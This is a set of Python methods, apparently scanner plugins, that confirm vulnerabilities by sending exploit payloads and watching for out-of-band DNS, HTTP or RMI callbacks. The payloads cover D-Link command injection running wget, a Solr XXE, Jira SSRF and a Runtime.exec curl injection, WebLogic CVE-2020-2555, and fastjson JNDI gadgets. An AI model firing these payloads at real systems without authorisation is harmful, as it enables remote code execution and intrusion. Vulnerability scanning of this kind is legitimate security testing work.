def verify(self): # 限定一下目录深度,reverse还是严格点 if self.url.count("/") != 3: return reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads(self.name, "dns") tasks = reverse_dnscmd + reverse_urls for task in tasks: self.exploit(task) # 存在delete task,单线程比较好 if self.isnifi: sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): if self.dictdata.get("url").get("extension") not in "": return if not self.can_output(self.parse.getrootpath() + self.name): # 限定只输出一次 return self.parse = dictdata_parser(self.dictdata) reqs = [] params = self.dictdata.get("request").get("params").get("params_url") # body为urlencode类型 if self.dictdata.get("request").get( "content_type") == 1: # data数据类型为urlencode params += self.dictdata.get("request").get("params").get( "params_body") # gen,payload 具体参数自己慢慢测试吧,没标定是那个参数 cmds = [] payloads_, hexdata = generate_reverse_payloads(self.name) _, dnshexdata = generate_reverse_payloads(self.name, "dns") for payload in payloads_: cmds.append(payload) cmds.append( payload.replace(reverse_set.get("reverse_http_ip"), dnshexdata)) for param in params: for cmd in cmds: for payload, func in self.payloads: payload = payload % (func(cmd)) req = self.parse.getreqfromparam(param, "a", payload, False) reqs.append(req) # send it mythread(self.send, reqs) # query sleep = True for hexdata in [hexdata, dnshexdata]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: self.result.append({ "name": self.name, "url": self.parse.getrootpath(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": self.parse.getrequestraw(), "response": self.parse.getresponseraw() } }) self.can_output(self.parse.getrootpath() + self.name, True) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return cmds, hexdata = generate_reverse_payloads("dlink-cve-2019-16920-rce" + self.url) url = cmds[0].split(" ")[-1] req = { "method": "POST", "url": self.url + "apply_sec.cgi", "headers": { "Content-Type": "application/x-www-form-urlencoded", }, "data": '''html_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20{}'''.format( url), "timeout": 10, "verify": False, "allow_redirects": False } r = request(**req) res, resdata = query_reverse(hexdata) if r != None and res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": parser_.geturl(), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others":"{} in reverse data".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def generatepayload(self, info, type): cmds, hexdata = generate_reverse_payloads(info, type) if type == "http": url = cmds[0].split(" ", 1)[1] else: url = "http://" + cmds[0].split(" ")[-1] return url, hexdata
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_urls, reverse_data = generate_reverse_payloads(self.name) _, dns_data = generate(self.name, "dns") tasks = [] for reverse_url in reverse_urls: for cmd in [reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data)]: for path in ["", "securityRealm/user/admin/"]: tasks.append((cmd, path)) mythread(self.run, list(set(tasks))) sleep = True for hexdata in [reverse_data, dns_data]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def get_cmds(self): datas = [] for method in ["http", "dns"]: random_str = get_random_str(8) cmds_, hexdata_ = generate_reverse_payloads(random_str, method) for cmd in cmds_: datas.append((cmd, hexdata_)) return datas
def verify(self): # 限定一下目录深度,涉及反连,谨慎点 if self.url.count("/") != 3: return # 验证是否是xxl-job req = { "method": "POST", "url": self.url + "run", "headers": { "Content-Type": "application/json" }, "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r is not None and b"com.xxl.job.core.server" in r.content: reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return req = { "method": "GET", "url": self.url + "solr/admin/cores?wt=json", "headers": self.dictdata.get("request").get("headers"), # 主要保留cookie等headers "timeout": 10, "allow_redirects": False, "verify": False, } r = request(**req) if r != None and r.status_code == 200 and b"responseHeader" in r.content: name = re.search('"name":"(.*?)"', r.text) if name: name = name.group(1) reverse_data = generate_reverse_payloads("solr_xxe") url = reverse_data[0][0].split(" ", 1)[1] req["url"] = self.url + '''solr/{name}/select?q=<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "{url}"> %remote;]> <root/>&wt=xml&defType=xmlparser'''.format(name=name, url=url) r1 = request(**req) query_res,data=query_reverse(reverse_data[1]) if query_res: request_ = "" response_ = "" if r1 != None: parser_ = response_parser(r1) request_ = parser_.getrequestraw() response_ = parser_.getresponseraw() self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "payload": req["url"].encode(), "vulmsg": self.vulmsg, "request": request_, "response": response_ } }) else: self.result.append({ "name": self.name, "url": self.url, "level": 0, # 0:Low 1:Medium 2:High "detail": { "payload": req["url"].encode(), "vulmsg": "target open solr ,target :{}".format(self.url + "solr/admin/cores?wt=json"), } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return # 验证是否是saltstack req = { "method": "GET", "url": self.url, "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r is not None and b"local_async" in r.content and b"local_batch" in r.content: reverse_urls, hexdata_url = generate_reverse_payloads(self.name) reverse_dnscmd, hexdata_dns = generate_reverse_payloads( self.name, "dns") # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) tasks = reverse_dnscmd + reverse_urls mythread(self.run, tasks) sleep = True for hexdata in [hexdata_url, hexdata_dns]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def generatepayloads(self): ''' 代码有点冗杂 ''' payloads = {"win": [], "linux": [], "hexdata": []} for method in ["http", "dns"]: cmds, hexdata = generate_reverse_payloads("201710271" + self.url, method) for cmd in cmds: if cmd.startswith("wget") or cmd.startswith( "curl") or cmd.startswith("ping -c"): payloads["linux"].append(cmd) else: payloads["win"].append(cmd) payloads["hexdata"].append(hexdata) return payloads
def verify(self): if not self.check_rule(self.dictdata, self.require): # 检查是否满足测试条件 return # 判断weblogic if "weblogic" not in "".join( self.dictdata.get("service").values()).lower(): return jarfile = os.path.join(paths.MYSCAN_HOSTSCAN_BIN, "weblogic", "CVE-2020-2555.jar") _, dnshexdata = generate(self.addr + get_random_str(6), "dns") protocol = "https" if "https" in "".join( self.dictdata.get("service").keys()) else "http" for cmd in ("ping -c 2", "ping -n 2"): start_process([ "java", "-jar", jarfile, "{protocol}://{addr}:{port}/".format(protocol=protocol, **self.dictdata), "{} {}".format(cmd, dnshexdata) ]) payloads, httphexdata = generate_reverse_payloads( self.addr + "cve_2020_2555", "http") for cmd in payloads: start_process([ "java", "-jar", jarfile, "{protocol}://{addr}:{port}/".format(protocol=protocol, **self.dictdata), "{}".format(cmd) ]) for i, hexdata in enumerate((dnshexdata, httphexdata)): sleep = True if i == 0 else False res, data = query_reverse(dnshexdata, sleep) if res: self.result.append({ "name": self.name, "url": "tcp://{}:{}".format(self.addr, self.port), "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others": "found {} in reverse log ".format(dnshexdata) } }) break
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return url = "{protocol}://{host}:{port}".format(**self.dictdata.get("url")) reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf") reverse_url = reverse_url[0].split(" ")[1] req = { "method": "GET", "headers": { "X-Atlassian-Token": "no-check", }, "url": self.url + "plugins/servlet/gadgets/makeRequest?url={}@{}".format( url, reverse_url), "allow_redirects": True, "verify": False, "timeout": 10 } r = request(**req) if r != None and b"don't be evil" in r.content: res, res_data = query_reverse(reverse_data) if res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 根据config.py 配置的深度,限定一下目录深度 if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2: return reverse_url, reverse_data = generate_reverse_payloads("jira_ssrf") reverse_url = reverse_url[0].split(" ")[1] req = { "method": "GET", "url": self.url + "secure/ContactAdministrators!default.jspa", "allow_redirects": False, "verify": False, "timeout": 10 } r = request(**req) if r != None and r.status_code == 200: res = re.search('name="atlassian-token" content="(?P<token>.+?)"', r.text) if res: token = res.groupdict().get('token') req["url"] = self.url + "secure/ContactAdministrators.jspa" req["method"] = "POST" req["data"] = "from=admin%40163.com&subject=%24i18n.getClass%28%29.forName%28%27java.lang.Runtime%27%29.getMethod%28%27getRuntime%27%2Cnull%29.invoke%28null%2Cnull%29.exec%28%curl+{reverseUrl}+%27%29.waitFor%28%29&details=exange%20website%20links&atl_token={token}&%E5%8F%91%E9%80%81=%E5%8F%91%E9%80%81".format( reverseUrl=quote(reverse_url), token=token) r1 = request(**req) if r1 != None and r1.status_code == 302: query_res, query_data = query_reverse(reverse_data) if query_res: parser_ = response_parser(r) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } })
def verify(self): # 限定一下目录深度,reverse还是严格点 if self.url.count("/") != 3: return reverse_urls, reverse_data = generate_reverse_payloads(self.name) # reverse_urls_ = filter(lambda x: x.startswith("curl") or x.startswith("wget"), reverse_urls) _, dns_data = generate(self.name, "dns") tasks = [] for reverse_url in reverse_urls: for cmd in [ reverse_url, reverse_url.replace(reverse_set.get("reverse_http_ip", ""), dns_data) ]: tasks.append(cmd) mythread(self.run, tasks) sleep = True for hexdata in [reverse_data, dns_data]: query_res, _ = query_reverse(hexdata, sleep) sleep = False if query_res: parser_ = dictdata_parser(self.dictdata) self.result.append({ "name": self.name, "url": self.url, "level": self.level, # 0:Low 1:Medium 2:High "detail": { "vulmsg": self.vulmsg, "others:": "{} in dnslog".format(hexdata), "request": parser_.getrequestraw(), "response": parser_.getresponseraw() } }) break
def verify(self): if self.dictdata.get("url").get("extension").lower() in notAcceptedExt: return if not self.dictdata.get("request").get("content_type") == 4: # data数据类型为json return parse = dictdata_parser(self.dictdata) #1.2.24 dnslog 测试 payload = ''' "%s":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://%s:80/%s", "autoCommit":true },''' domain_ = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "dns")[1] # 获取请求的域名 payload = payload % ( get_random_str(6).lower(), domain_, get_random_str(5).lower()) # 格式化payload body_withpayload = parse.addpayloadtobody(parse.getrequestbody(), payload.encode(), b"{") # 在body中插入payload if body_withpayload: # 判断是否成功 req = parse.generaterequest({"data": body_withpayload, "timeout": 10}) r = request(**req) self.save(r,domain_,"fastjson 1.2.24 dns test") #1.2.24 rmi 连接测试 payload = ''' "%s":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"%s", "autoCommit":true },''' # 因为是插入到第一个key前面,所以最后一个逗号,双引号也是json标准规定 rmi_address,hexdata = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "rmi") # 获取请求的域名 for rmi_addr in rmi_address: payload_ = payload % (get_random_str(4).lower(), rmi_addr) body_withpayload=parse.addpayloadtobody(parse.getrequestbody(),payload_.encode(),b"{") if body_withpayload: # 判断是否成功 req = parse.generaterequest({"data": body_withpayload, "timeout": 10}) r = request(**req) self.save(r, hexdata,"fastjson 1.2.24 rmi test") #1.2.47 dns 测试 payload = ''' "%s":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "%s":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://%s:80/%s", "autoCommit":true },''' # 因为是插入到第一个key前面,所以最后一个逗号,双引号也是json标准规定 domain_ = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "dns")[1] # 获取请求的域名 payload = payload % ( get_random_str(6).lower(), get_random_str(6).lower(), domain_, get_random_str(5).lower()) # 格式化payload body_withpayload = parse.addpayloadtobody(parse.getrequestbody(), payload.encode(), b"{") # 在body中插入payload if body_withpayload: # 判断是否成功 req = parse.generaterequest({"data": body_withpayload, "timeout": 10}) r = request(**req) self.save(r,domain_,"fastjson 1.2.47 dns test") #1.2.47 rmi 测试 payload = ''' "%s":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "%s":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"%s", "autoCommit":true },''' # 因为是插入到第一个key前面,所以最后一个逗号,双引号也是json标准规定 rmi_address, hexdata = generate_reverse_payloads(self.dictdata.get("url").get("url").split("?")[0], "rmi") # 获取请求的域名 for rmi_addr in rmi_address: payload_ = payload % (get_random_str(4).lower(),get_random_str(4).lower(), rmi_addr) body_withpayload = parse.addpayloadtobody(parse.getrequestbody(), payload_.encode(), b"{") if body_withpayload: # 判断是否成功 req = parse.generaterequest({"data": body_withpayload, "timeout": 10}) r = request(**req) self.save(r, hexdata, "fastjson 1.2.47 rmi test")